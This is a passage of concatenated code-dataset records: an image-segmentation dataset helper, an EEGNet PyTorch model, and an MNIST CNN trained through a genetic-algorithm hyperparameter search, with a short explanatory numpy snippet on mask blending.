self.img_dir_path,\n \"mask_dir\": self.mask_dir_path,\n \"imgs_list\": self.get_img_list() # names saved with jpeg format\n },\n fp, indent=2)\n\n\ndef cfg2filter(cfg, ds_lists):\n \"\"\"\n Changes lists of datasets according to the filter\n :param cfg: consists of name, and private settings for each filter\n :param ds_lists: (datasets_lists) dictionary where key is the name\n of dataset and value is a list of imgs\n :return: changed ds_lists\n \"\"\"\n if cfg.name == \"pass\":\n pass\n else:\n msg = f\"Wrong filter \\\"{cfg.name}\\\"\"\n log.critical(msg)\n raise Exception(msg)\n\n return ds_lists\n\n\ndef cfg2datasets(cfg):\n \"\"\"\n :param cfg: dataset_cfg from main config\n consist of:\n 1) device - where to contain returned images\n 2) path - path to the file to read to get list of images for each dataset\n and path to the folder where it contains.\n 3) filter - manipulations with datasets to get new\n 4) bgr_trfm, fgr_trfm, trfm, preproc\n\n :return: dictionary: {dataset_name1: dataset1, ...}\n \"\"\"\n with open(cfg.path, \"r\") as f:\n file_dict = json.load(f)\n\n img_path = file_dict[\"img_path\"]\n mask_path = file_dict[\"mask_path\"]\n ds_lists = cfg2filter(cfg.filter, file_dict[\"dataset_lists\"])\n\n # converting configs to transformations\n bgr_trfm = cfg2trfm(cfg.bgr_trfm)\n fgr_trfm = cfg2trfm(cfg.fgr_trfm)\n trfm = cfg2trfm(cfg.trfm)\n preproc = cfg2trfm(cfg.preproc)\n\n # creating\n datasets = {}\n for ds_name in ds_lists:\n if ds_name == \"validation\":\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=A.Compose([]), fgr_trfm=A.Compose([]), trfm=A.Compose([]), preproc=preproc,\n device=torch.device(cfg.device)\n )\n else:\n datasets[ds_name] = ImgMaskSet(\n log_name=ds_name,\n img_dir_path=img_path, mask_dir_path=mask_path,\n img_list=ds_lists[ds_name],\n bgr_trfm=bgr_trfm, fgr_trfm=fgr_trfm, trfm=trfm, preproc=preproc,\n device=torch.device(cfg.device)\n )\n\n return datasets\n\n\ndef datasets2json_file(datasets: Dict[str, ImgMaskSet], save_path: str):\n key = [i for i in datasets.keys()][0]\n ds_dict = {\n \"img_path\": datasets[key].img_dir_path,\n \"mask_path\": datasets[key].mask_dir_path\n }\n\n for dataset_name, dataset in datasets.items():\n ds_dict[dataset_name] = dataset.get_img_list()\n\n with open(os.path.join(save_path, \"datasets.json\"), \"w\") as fp:\n json.dump(ds_dict, fp, 
indent=4)\n\n","repo_name":"ChocoL0rd/ImgSegmentation","sub_path":"new_code/tools/dataset_tools.py","file_name":"dataset_tools.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
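# apply_aug in the record above composites two independently augmented copies of the
# same image: foreground pixels (mask == 1) come from the fgr_trfm output, background
# pixels from the bgr_trfm output. A minimal numpy sketch of that blend on a synthetic
# 4x4 image (the real code uses 330x330 images and albumentations transforms):

import numpy as np

fgr = np.full((4, 4, 3), 200, dtype=np.uint8)   # stand-in for the fgr-transformed image
bgr = np.full((4, 4, 3), 50, dtype=np.uint8)    # stand-in for the bgr-transformed image
mask = np.zeros((4, 4, 1), dtype=np.uint8)
mask[1:3, 1:3] = 1                              # foreground square in the middle

blended = (fgr * mask + bgr * (1 - mask)).astype("uint8")
print(blended[:, :, 0])
# the centre 2x2 block is 200 (foreground), the border stays 50 (background)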
+{"seq_id":"329146403","text":"'''\n EEGNet pytorch network\n @param\n f1: first conv input channel\n f2: depthwise conv input channel\n fout: sparable conv input channel\n k1: first conv kernel size\n k2: depthwise conv kernel size\n k3: sparable conv kernel size\n do: dropout probability\n'''\n# Torch\nimport torch\nfrom torchvision import datasets, transforms\nimport torch.utils.data as Data\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\n\nclass EEGNet(torch.nn.Module):\n\t# Activation:\n # 0 -> ELU\n # 1 -> ReLU\n # 2 -> LeakyReLU\n def __init__(self, activation=0, f1=16, f2=32, fout=32, k1=51, k2=2, k3=15, do=0.25):\n super(EEGNet, self).__init__()\n if activation == 0:\n \tactivation_f = nn.ELU()\n elif activation == 1:\n \tactivation_f = nn.ReLU()\n else:\n \tactivation_f = nn.LeakyReLU()\n self.firstConv = nn.Sequential(\n nn.Conv2d(1, f1, kernel_size=(1, k1), stride=(1, 1), padding=(0, 25), bias=False),\n nn.BatchNorm2d(f1, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)\n )\n self.depthwiseConv = nn.Sequential(\n nn.Conv2d(f1, f2, kernel_size=(k2, 1), stride=(1, 1), groups=16, bias=False),\n nn.BatchNorm2d(f2, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n activation_f, \n nn.AvgPool2d(kernel_size=(1,4), stride=(1, 4), padding=0),\n nn.Dropout(p=do)\n )\n self.separableConv = nn.Sequential(\n nn.Conv2d(f2, fout, kernel_size=(1, k3), stride=(1, 1), padding=(0, 7), bias=False),\n nn.BatchNorm2d(fout, eps=1e-5, momentum=0.1, affine=True, track_running_stats=True),\n nn.ELU(),\n nn.AvgPool2d(kernel_size=(1,8), stride=(1, 8), padding=0),\n nn.Dropout(p=do)\n )\n self.classify = nn.Sequential(\n nn.Linear(in_features=fout*23, out_features=2, bias=True)\n )\n def forward(self, x):\n res = self.firstConv(x)\n res = self.depthwiseConv(res)\n res = self.separableConv(res)\n res = res.view(res.size(0), -1)\n res = self.classify(res)\n return res\n","repo_name":"sean85914/deep_learning_2019","sub_path":"Lab2/code/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30544926387","text":"\n# %%\n# imports\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n# for the random seed\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import Adagrad\nfrom tensorflow.keras.initializers import RandomUniform\nfrom time import time\nfrom random import randint\n\n#tf.debugging.set_log_device_placement(False)\n\ntry:\n\ttf.device('/device:GPU')\nexcept:\n\ttf.device('/device:CPU')\n\n# set the random seeds to get reproducible results\nprint(\"#\"*25, \" Code Start\", \"#\"*25,\"\\n\")\nnp_seed = np.random.seed(1)\ntf_seed = tf.random.set_seed(2)\n\n# Load data from https://www.openml.org/d/554\nprint(\"#\"*25, \" Load Data\", \"#\"*25,\"\\n\")\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\n\nX, y = X[:1000], y[:1000] # modified from 1000 to 5000\n# reduces the dataset which has 70000 images to a smaller set\n\n### deep learning is supervised \n#X = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\nX = X.reshape(X.shape[0], 28, 28, 1) # rows, height, width, color channel\n# Normalize\nX = X / 255. # 8bit 2**8 =256 \n\n# number of unique classes\nnum_classes = len(np.unique(y))\ny = y.astype(int)\nprint(\"#\"*25, \" Split Data\", \"#\"*25,\"\\n\")\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=1)\n\nnum_tot = y.shape[0] # number images in the dataset\nnum_train = y_train.shape[0] #number of images for the training phase\nnum_test = y_test.shape[0] #number of images for the test phase\n\nprint(\"#\"*25, \" One Hot Encoding\", \"#\"*25,\"\\n\")\ny_oh = np.zeros((num_tot, num_classes)) #generate a blank array to be filled with one-hotenc\ny_oh[range(num_tot), y] = 1 # replace \n\ny_oh_train = np.zeros((num_train, num_classes))\ny_oh_train[range(num_train), y_train] = 1\n\ny_oh_test = np.zeros((num_test, num_classes))\ny_oh_test[range(num_test), y_test] = 1\n\nprint(\"#\"*25, \" Questions Part I\", \"#\"*25,\"\\n\")\n#### Question 1 Code Answers\nfor num, y_value in enumerate(y):\n\tif num<10:\n\t\tprint(y_value, y_oh[num])\n\nax1 = plt.subplot(131) ### ( row=1 column=3 imgnumber=1 )\nax1.imshow(X[0]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax1.set_title( label = \"Y label = \"+ str( y[0] ))\n\nax2 = plt.subplot(132) ### ( row=1 column=1 imgnumber=2 )\nax2.imshow(X[10]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax2.set_title( label = \"Y label =\"+ str(y[10]))\n\nax3 = plt.subplot(133) ### ( row=1 column=1 imgnumber=3 )\nax3.imshow(X[20]) ### X must be in the reshaped form (28,28,1) or (28,28) depeding on the matplot lib version\nax3.set_title( label = \"Y label =\"+ str(y[20]))\nplt.show()\n# %%\nprint(\"#\"*25, \" Load CNN Class \", \"#\"*25,\"\\n\")\nclass MyCNN():\n\tdef __init__(self,\n\t\t\t\t X_train, y_oh_train, X_test, y_oh_test, y_test,\n\t\t\t\t activ_func = 'relu', last_layer_func = 'softmax' , ### Functions\n\t\t\t\t standard_kernel = (3, 3), input_shape=(28, 28, 1), ### CNN input\n\t\t\t\t num_classes = 10 , ### CNN output\n\t\t\t\t min_image_kernels = 16, dropout_rate = 0.1, ### CNN parameters\n\t\t\t\t 
lr = 0.02, decay = 1e-6, momentum = 0.9, ### Optimizer parameters\n\t\t\t\t batch_size = 1000, epochs=1000, ### Batch and Epoch\n\t\t\t\t loss='categorical_crossentropy', optimizer = \"SGD\"): ### loss type\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.activ_func = activ_func\n\t\tself.last_layer_func = last_layer_func\n\t\tself.standard_kernel = standard_kernel\n\t\tself.input_shape = input_shape\n\t\tself.num_classes = num_classes\n\t\tself.dropout_rate = dropout_rate\n\t\tself.mik = min_image_kernels\n\t\tself.lr = lr\n\t\tself.decay=decay\n\t\tself.momentum=momentum\n\t\tself.batch_size = batch_size\n\t\tself.epochs = epochs\n\t\t\n\t\tself.optimizer = optimizer\n\t\t#self.initializer = tf.keras.initializers.Zeros()\n\t\t### under dev. = initializer =RandomUniform(minval=0.9, maxval=1., seed=1)\n\n\tdef create_model(self):\n\n\t\tself.model = Sequential()\n\t\tself.model.add( Conv2D( self.mik , (3, 3), \n\t\t\t\t\t\t\t activation= self.activ_func, \n\t\t\t\t\t\t\t input_shape= self.input_shape\n\t\t\t\t\t\t\t ))\n\n\t\t### Conv layer 1 - getting overall details\n\t\t### the more filters/kernels you add, the more capacity the network usually has\n\t\t### the larger the kernel, the larger the image region each filter sees\n\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) )\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Conv2D(self.mik * 2 , (3, 3), \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### Conv layer 2 - getting more details\n\t\t# Max pooling\n\t\tself.model.add( MaxPooling2D ( pool_size = (2, 2) ) ) ### summarises information and has no weights\n\n\t\tself.model.add(Flatten())\n\n\t\tself.model.add(Dense( self.mik * 8, \n\t\t\t\t\t\t\t\tactivation = self.activ_func\n\t\t\t\t\t\t\t\t)) ### first hidden layer of the fully connected\n\n\t\tself.model.add(Dropout(self.dropout_rate))\n\n\t\tself.model.add(Dense(self.num_classes, activation=self.last_layer_func\n\t\t\t\t\t\t\t\t)) ### output layer: softmax probabilities over the classes\n\n\t\tself.sgd = SGD(lr = self.lr, decay = self.decay, momentum = self.momentum, nesterov=True) #####\n\t\tself.rmsp = RMSprop(learning_rate = self.lr, rho=0.9, momentum=0.0, epsilon= self.decay, centered=False)\n\t\tself.adag =Adagrad(learning_rate=self.lr, initial_accumulator_value=0.1, epsilon=self.decay)\n\n\t\tif self.optimizer == \"SGD\":\n\t\t\toptim = self.sgd\n\t\telif self.optimizer == \"RMSProp\":\n\t\t\toptim = self.rmsp\n\t\telif self.optimizer == \"AdaGrad\":\n\t\t\toptim = self.adag\n\n\t\t# Compile the model\n\t\tself.model.compile(loss='categorical_crossentropy', optimizer=optim )\n\n\tdef train(self):\n\t\tstart_time = time()\n\t\tself.history = self.model.fit(self.X_train, \n\t\t\t\t\t\t\t\t\t self.y_oh_train, \n\t\t\t\t\t\t\t\t\t batch_size= self.batch_size, \n\t\t\t\t\t\t\t\t\t epochs=self.epochs, verbose = 0,\n\t\t\t\t\t\t\t\t\t validation_data = (self.X_test,self.y_oh_test)) ### \n\t\tend_time = time()\n\t\tself.train_time = end_time - start_time\n\n\tdef plot_train(self):\n\t\tplt.plot(self.history.history['loss'])\n\t\tplt.title('model loss')\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.show()\n\n\tdef test(self):\n\t\t# Evaluate performance\n\t\tself.test_loss = self.model.evaluate(self.X_test, self.y_oh_test, batch_size= self.batch_size)\n\n\t\tself.predictions_perc = self.model.predict(self.X_test, batch_size = 
self.batch_size)\n\t\tself.predictions_norm = np.argmax(self.predictions_perc, axis=1) \n\t\t# change encoding again\n\n\t\tself.accuracy = ( (self.predictions_norm == self.y_test).sum() / self.predictions_norm.shape[0])\n\t\tprint('Accuracy:', self.accuracy, \"\\n\")\n\nprint(\"#\"*25, \" Load Genetic Algorithm Class \", \"#\"*25,\"\\n\")\nclass Genetic_Algorithm():\n\t\n\tdef __init__(self, \n\t\tlr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\tX_train, y_oh_train, X_test, y_oh_test,y_test, \n\t\tnum_agents = 8): \n\t \n\t\t### Available Hyperparameters - lr_ls, decay_ls, batch_size_ls, epoch_ls, dropout_ls\n\t\t### Input train and test data - X_train, y_oh_train, X_test, y_oh_test,y_test\n\t\t### Genetic Algorithm hyperparameters - num_agents = 8 \n\t\tself.lr_ls = lr_ls\n\t\tself.decay_ls = decay_ls\n\t\tself.batch_size_ls = batch_size_ls\n\t\tself.epoch_ls = epoch_ls\n\t\tself.dropout_ls = dropout_ls\n\t\tself.optimizer_ls = optimizer_ls\n\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tself.tt_gen_pos_06 = len(optimizer_ls)\n\n\t\tself.num_agents = num_agents\n\n\t\tself.X_train = X_train\n\t\tself.y_oh_train = y_oh_train\n\t\tself.X_test = X_test\n\t\tself.y_oh_test = y_oh_test\n\t\tself.y_test = y_test\n\n\t\tself.tested_policies = {}\n\n\t@staticmethod\n\tdef convert_policy_2_name(policy):\n\t\tpolicy_name = str(policy)[1:-1]\n\t\tpolicy_name = policy_name.replace(\", \", \"-\")\n\t\treturn policy_name\n\n\t@staticmethod\n\tdef convert_name_2_policy(policy_name):\n\t\tstr_ls = policy_name.split(\"-\")\n\t\tarray = np.array(str_ls).astype(int)\n\t\tpolicy = array.tolist()\n\t\treturn policy\n\n\t### under dev\n\tdef store_policy_result (self, result):\n\t\tpolicy = result[0]\n\t\t# result = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy, score]\n\n\t\tpolicy_name = self.convert_policy_2_name(policy)\n\n\t\tif policy_name not in self.tested_policies.keys():\n\t\t\tself.tested_policies[policy_name] = [result]\n\t\telse:\n\t\t\tpolicy_results = self.tested_policies[policy_name]\n\t\t\tpolicy_results.append(result)\n\t\t\tself.tested_policies[policy_name] = policy_results\n\t\t\t\t\t\t\t\t\t\t\t\t\n\tdef gen_random_policy(self):\n\t\t\n\t\tgen_pos_01 = randint(0, self.tt_gen_pos_01-1) ###learning_rate\n\t\tgen_pos_02 = randint(0, self.tt_gen_pos_02-1) ###decay_rate\n\t\tgen_pos_03 = randint(0, self.tt_gen_pos_03-1) ###batch_size\n\t\tgen_pos_04 = randint(0, self.tt_gen_pos_04-1) ###epochs\n\t\tgen_pos_05 = randint(0, self.tt_gen_pos_05-1) ###dropout_rate\n\t\tgen_pos_06 = randint(0, self.tt_gen_pos_06-1) ###dropout_rate\n\t\tpolicy = [gen_pos_01, gen_pos_02, gen_pos_03, gen_pos_04, gen_pos_05,gen_pos_06 ]\n\t\t### A policy is composed by index to retrieve values from:\n\t\t# self.lr_ls where policy[0] = lr\n\t\t# self.decay_ls where policy[1] = decay\n\t\t# self.batch_size_ls where policy[2] = batch_size\n\t\t# self.epoch_ls where policy[3] = epochs\n\t\t# self.dropout_ls where policy[4] = dropout_rate\n\t\treturn policy\n\t\n\tdef generate_single_agent (self, policy):\n\n\t\tlr_index = policy[0]\n\t\tdecay_index = policy[1]\n\t\tbs_index = policy[2]\n\t\tep_index = policy[3]\n\t\tdr_index = policy[4]\n\t\topt_index = policy[5]\n\t\t\n\t\tmodelCNN = MyCNN(self.X_train, self.y_oh_train, \n\t\t\t\t\t\t\tself.X_test, self.y_oh_test, self.y_test,\n\t\t\t\t\t\t\tdropout_rate = 
self.dropout_ls[dr_index], \n\t\t\t\t\t\t\tlr = self.lr_ls[lr_index], \n\t\t\t\t\t\t\tdecay = self.decay_ls[decay_index], \n\t\t\t\t\t\t\tbatch_size = self.batch_size_ls[bs_index], \n\t\t\t\t\t\t\tepochs=self.epoch_ls[ep_index],\n\t\t\t\t\t\t\toptimizer=self.optimizer_ls[opt_index])\n\n\t\tprint('#'*3,' Model Training: \\n')\n\t\tprint('- optimizer : lr= {} decay= {}'.format( self.lr_ls[lr_index], self.decay_ls[decay_index]))\n\t\tprint('- neurons : dropout_rate {}'.format(self.dropout_ls[dr_index]))\n\t\tprint('- batch_size= {} epochs= {} '.format(self.batch_size_ls[bs_index], self.epoch_ls[ep_index]),'#'*3,\"\\n\")\n\n\t\tmodelCNN.create_model()\n\t\tmodelCNN.train()\n\t\tmodelCNN.test()\n\t\t#print(modelCNN.model.summary())\n\t\tresult = [policy, modelCNN.history, modelCNN.train_time, modelCNN.accuracy] \n\t\treturn result\n\n\tdef initialize_agents(self):\n\t\tself.overall_results = []\n\t\t\n\t\tfor _ in range(self.num_agents):\n\t\t\tpolicy = self.gen_random_policy()\n\t\t\tresult = self.generate_single_agent(policy)\n\t\t\t#[:,0]\n\t\t\t#if policy not in self.overall_results: ###\n\t\t\tself.overall_results.append(result)\n\t\t\tself.store_policy_result(result)\n\t\t\n\tdef evaluate_policies(self):\n\t\tresults_array = np.array(self.overall_results)\n\t\taccuracy_arr = results_array[:,3]\n\t\tself.overall_accuracy = accuracy_arr.mean()\n\t\tself.max_accuracy = accuracy_arr.max()\n\n\t\ttime_arr = results_array[:,2]\n\t\tself.overall_time = time_arr.mean()\n\t\tself.min_time = time_arr.min()\n\t\t\n\t\tpolicy_score_sorter = {}\n\t\tsorted_scores = []\n\t\tfor num, result in enumerate(self.overall_results):\n\t\t\tscore = 0 \n\t\t\t\n\t\t\tif result[3] > 0.5:\n\t\t\t\tscore += 10\n\n\t\t\tif result[3] >= self.overall_accuracy:\n\t\t\t\tif result[3] == self.max_accuracy:\n\t\t\t\t\tscore += 20\n\n\t\t\t\telse:\n\t\t\t\t\tscore += 3\n\t\t\t\n\t\t\tif result[2] <= self.overall_time:\n\t\t\t\tif result[2] == self.min_time:\n\t\t\t\t\tscore += 10\n\t\t\t\telse:\n\t\t\t\t\tscore += 5\n\n\t\t\tpolicy_score_sorter[num] = score \n\n\t\tsorted_scores = sorted(policy_score_sorter.items(), \n\t\t\t\t\t\t\t\t key=lambda kv: kv[1], \n\t\t\t\t\t\t\t\t reverse=True)\n\t\tsorted_policies = [] \n\t\t### sorted_policies [(score, policy)] it will sort from highest to lowest\n\t\tfor policy_num, score in sorted_scores:\n\t\t\tsorted_policies.append(self.overall_results[policy_num])\n\t\t\n\t\tself.overall_results = sorted_policies\n\t\n\tdef agent_selection (self):\n\t\t\n\t\tself.parents = []\n\t\t### Make sure odd numbers are not used\n\t\t### The last agent with the worst performance is droppped\n\t\tif len(self.overall_results)%2 != 0:\n\t\t\tself.overall_results.pop(-1)\n\t\t### max pairs is the number of existing agents divided by four\n\t\t### since each pair generates 2 offsprings \n\t\t### we will keep the same number of agents to avoid exponential growth of agent population\n\t\tmax_pairs = int(len(self.overall_results)//4)\n\t\tpossible_parents = len(self.overall_results)-1\n\t\tcount = 0\n\n\t\twhile len(self.parents) < max_pairs:\n\n\t\t\tif count < max_pairs:\n\n\t\t\t\tparent1 = count\n\t\t\t\tparent2 = np.random.choice(possible_parents, size=((1)))[0]\n\t\t\t\tparents_codes = np.array([parent1,parent2])\n\n\t\t\telse:\n\t\t\t\tparents_codes = np.random.choice(possible_parents, size=((2)))\n\n\t\t\tif parents_codes[0] != parents_codes[1]:\n\n\t\t\t\tparent1 = parents_codes[0]\n\t\t\t\tparent2 = parents_codes[1]\n\n\t\t\t\tpolicy1 = np.array(self.overall_results[parent1][0])\n\t\t\t\tpolicy2 
= np.array(self.overall_results[parent2][0])\n\t\t\t\t#\n\t\t\t\tself.parents.append([policy1,policy2])\n\t\t\t\tcount += 1\n\n\tdef crossover(self, policy1, policy2,genes_pos = [0, 2, 4]):\n\t\t'''\n\t\tArguments\n\t\t----------\n\t\tpolicy1: parent 1\n\t\tpolicy2: parent 2\n\t\tself.tt_gen_pos_01 = len(lr_ls)\n\t\tself.tt_gen_pos_02 = len(decay_ls)\n\t\tself.tt_gen_pos_03 = len(batch_size_ls)\n\t\tself.tt_gen_pos_04 = len(epoch_ls)\n\t\tself.tt_gen_pos_05 = len(dropout_ls)\n\t\tself.tt_gen_pos_06 = len(optimizer_ls)\n\t\tReturn\n\t\t--------\n\t\tnew_policy: offspring\n\t\t'''\n\t\tpolicyX = policy1.copy()\n\t\tpolicyY = policy2.copy()\n\t\tfor g_pos in genes_pos:\n\t\t\t#from IPython import embed; embed()\n\t\t\tslice_policyX = policyX[g_pos]\n\t\t\tslice_policyY = policyY[g_pos]\n\n\t\t\tpolicyY[g_pos]=slice_policyX\n\t\t\tpolicyX[g_pos]=slice_policyY\n\n\t\tchild_policy1 = policyY\n\t\tchild_policy2 = policyX\n\t\t# generate a child policy from cross-over of the parents\n\n\t\treturn child_policy1, child_policy2\n\n\tdef mutation (self, policy, nun_gen_2_mutate = 2, mut_prob_thr=0.05):\n\n\t\tmutation_prob = float(np.random.choice(100,1))/100\n\t\tavailable_positions = np.arange(0,6) ## all 6 gene positions\n\n\t\tif mutation_prob <= mut_prob_thr:\n\n\t\t\tpositions = []\n\t\t\tmutations = []\n\n\t\t\tfor _ in range(nun_gen_2_mutate):\n\n\t\t\t\tposition = int( np.random.choice( 6, 1) ) ## 6 gene positions\n\t\t\t\tif position == 0:\n\t\t\t\t\tall_moves = self.tt_gen_pos_01 - 1\n\t\t\t\telif position == 1:\n\t\t\t\t\tall_moves = self.tt_gen_pos_02 - 1\n\t\t\t\telif position == 2:\n\t\t\t\t\tall_moves = self.tt_gen_pos_03 - 1\n\t\t\t\telif position == 3:\n\t\t\t\t\tall_moves = self.tt_gen_pos_04 - 1\n\t\t\t\telif position == 4:\n\t\t\t\t\tall_moves = self.tt_gen_pos_05 - 1\n\t\t\t\telif position == 5:\n\t\t\t\t\tall_moves = self.tt_gen_pos_06 - 1\n\t\t\t\tif all_moves == 0:\n\t\t\t\t\tmove =0\n\t\t\t\telse:\n\t\t\t\t\tmove = int( np.random.choice( all_moves, 1 ) ) \n\n\t\t\t\tif position not in positions:\n\t\t\t\t\tpos_mask = available_positions != position\n\t\t\t\t\tavailable_positions = available_positions[pos_mask]\n\t\t\t\t\tpositions.append(position)\n\t\t\t\telse:\n\t\t\t\t\tposition = int(np.random.choice(available_positions,1))\n\t\t\t\t\tpositions.append(position)\n\t\t\t\t\n\t\t\t\tmutate = [move, position] \n\t\t\t\tmutations.append(mutate)\n\t\t\t\tpolicy[position] = move\n\n\t\treturn policy\n\t\n\tdef update_agents(self):\n\n\t\tself.agent_selection() ### this updates which agents will perform crossover in self.parents, where parents = [ [policy1,policy2], [policyN,policyM]]\n\t\t\n\t\tnew_policies = []\n\t\tfor policy1, policy2 in self.parents:\n\t\t\tchild_policy1, child_policy2 = self.crossover(policy1, policy2)\n\n\t\t\tchild_policy1 = self.mutation(child_policy1)\n\t\t\tchild_policy2 = self.mutation(child_policy2)\n\n\t\t\tnew_policies.append(child_policy1)\n\t\t\tnew_policies.append(child_policy2)\n\n\t\t### drop weaker older agents\n\t\tnew_agents = int(len(new_policies))\n\t\tfor _ in range (new_agents):\n\t\t\tself.overall_results.pop(-1)\n\n\t\t### add new agents\n\t\tprint(\"\\n Add New Policies \")\n\t\tcount =0\n\t\tfor new_policy in new_policies:\n\t\t\tnew_policy_ls = new_policy.tolist() ### return from numpy to list format\n\t\t\tnew_result = self.generate_single_agent(new_policy_ls)\n\t\t\t#print(\"new_policy = \", count, new_policy)\n\t\t\t#print(\"overall_results length= \", len(self.overall_results))\n\t\t\t#print(\"shape overall_results = \", np.array(self.overall_results).shape)\n\t\t\tself.overall_results.append(new_result)\n\t\t\tself.store_policy_result(new_result)\n\t\t\tcount += 1\n\t\t\n\tdef show_result(self,result,num):\n\n\t\tpolicy = result[0]\n\n\t\tlr_index = policy[0]; lr = self.lr_ls[lr_index]\n\t\tdecay_index = policy[1]; decay = self.decay_ls[decay_index] \n\t\tbs_index = policy[2]; batch_size = self.batch_size_ls[bs_index]\n\t\tep_index = policy[3]; epochs=self.epoch_ls[ep_index]\n\t\tdr_index = policy[4]; dropout_rate = self.dropout_ls[dr_index] \n\t\topt_index = policy[5]; optimizer = self.optimizer_ls[opt_index] \n\t\t\n\t\thistory = result[1]\n\t\tplt.plot(history.history['loss'])\n\t\tplt.plot(history.history['val_loss'])\n\t\ttitle = 'model number {} time to train= {} seconds and accuracy {} % \\n'.format( num, np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer: {} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\t\t\t\n\t\tplt.title( title)\n\t\tplt.ylabel('loss')\n\t\tplt.xlabel('epoch')\n\t\tplt.legend(['train', 'val'], loc='upper left')\n\t\tplt.ylim((0,15))\n\t\tplt.show()\n\n\tdef best_models(self, final_models = 3, max_generations = 5):\n\n\t\tcount = 0\n\t\twhile count <= max_generations:\n\t\t\tprint(\"#\"*200)\n\t\t\tprint(\"#\"*25, \" Generation {}\".format(count), \"#\"*25,\"\\n\")\n\t\t\tif count == 0:\n\t\t\t\tself.initialize_agents()\n\t\t\telse:\n\t\t\t\tself.update_agents()\n\t\t\tself.evaluate_policies()\n\t\t\tcount += 1\n\t\t\n\t\tbest_models = []\n\t\tfor num in range(final_models):\n\t\t\tresult = self.overall_results[num]\n\t\t\tself.show_result(result,num)\n\t\t\tbest_models.append(result)\n\t\treturn best_models\n\nprint(\"#\"*25, \" Set hyperparameters lists\", \"#\"*25,\"\\n\")\nlr_ls = [1e-3,1e-4]\ndecay_ls = [1e-6,1e-7]\nbatch_size_ls = [32,500]\nepoch_ls = [150,250]\ndropout_ls = [0.05, 0.01]\noptimizer_ls = [\"SGD\",\"AdaGrad\",\"RMSProp\"]\n\nprint(\"#\"*25, \" Genetic Algorithm Start\", \"#\"*25,\"\\n\")\nga = Genetic_Algorithm(lr_ls,decay_ls,batch_size_ls, epoch_ls, dropout_ls, optimizer_ls,\n\t\t\t\t\t\tX_train, y_oh_train, X_test, y_oh_test, y_test, num_agents=30)\n\nprint(\"#\"*25, \" Search Best Models\", \"#\"*25,\"\\n\")\nbest = ga.best_models(final_models = 10, max_generations = 2)\n\nall_results = ga.tested_policies\n\nfor policy_name in all_results.keys():\n\tpolicy = ga.convert_name_2_policy(policy_name)\n\n\tlr_index = policy[0]\n\tdecay_index = policy[1]\n\tbs_index = policy[2]\n\tep_index = policy[3]\n\tdr_index = policy[4]\n\topt_index = policy[5]\n\t\n\tdropout_rate = ga.dropout_ls[dr_index]\n\tlr = ga.lr_ls[lr_index]\n\tdecay = ga.decay_ls[decay_index]\n\tbatch_size = ga.batch_size_ls[bs_index]\n\tepochs=ga.epoch_ls[ep_index]\n\toptimizer = ga.optimizer_ls[opt_index]\n\n\tfor result in all_results[policy_name]:\n\t\t\n\t\ttitle = '\\n model - time to train= {} seconds and accuracy {} % \\n'.format( np.round(result[2], decimals=2), np.round(result[3], decimals = 3)*100)\n\t\ttitle += ' - optimizer :{} lr= {} decay= {} \\n'.format(optimizer, lr, decay)\n\t\ttitle += ' - neurons : dropout_rate {} \\n'.format(dropout_rate)\n\t\ttitle += ' - batch_size= {} epochs= {} '.format(batch_size, epochs)\n\t\tprint(title)\n\n\n# %%\n\n\n# ### Question 1\n# **The data set**\n# \n# Plot three examples from the data set.\n# * What type of data are in the data 
